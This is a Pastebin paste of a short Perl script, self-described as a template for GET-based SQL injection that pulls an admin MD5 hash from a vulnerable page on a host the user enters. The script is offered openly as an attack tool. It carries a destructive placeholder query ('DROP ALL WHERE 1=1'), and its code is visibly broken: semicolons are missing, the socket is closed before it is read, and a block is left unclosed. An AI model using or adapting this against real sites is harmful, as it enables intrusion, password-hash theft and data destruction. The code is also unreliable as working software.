Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # www.infodox.co.cc
- # blog.infodox.co.cc
- # http://twitter.com/info_dox
- #Template for GET SQL injections that retrieve an admin MD5 hash
- use IO::Socket
- ### CONFIG ###
- $vuln="vuln.php?vuln=" # the vuln page and param
- $sql="DROP ALL WHERE 1=1" # some SQL code to be ran :)
- $useragent="FireFox blah blah blah"
- ### END OF CONFIG ###
- print "Insert the host to connect: ";
- chomp ($host=<STDIN>);
- $sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$host", PeerPort=>80)
- or die "[-] Connecting ... Can't connect to host.\n\n";
- $injection=$vuln.$sql
- print $sock "GET $injection HTTP/1.1\n";
- print $sock "Accept: */*n";
- print $sock "User-Agent: $useragent\n";
- print $sock "Host: $host\n";
- print $sock "Connection: close\n\n";
- close ($sock); #this line terminates the connection
- # this bit validates MD5 hashes.
- while($answer = <$sock>) {
- if ($answer =~ /([0-9a-f]{32})/) {
- print "[+] Found! The password hash is: $1\n";
- exit(); }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
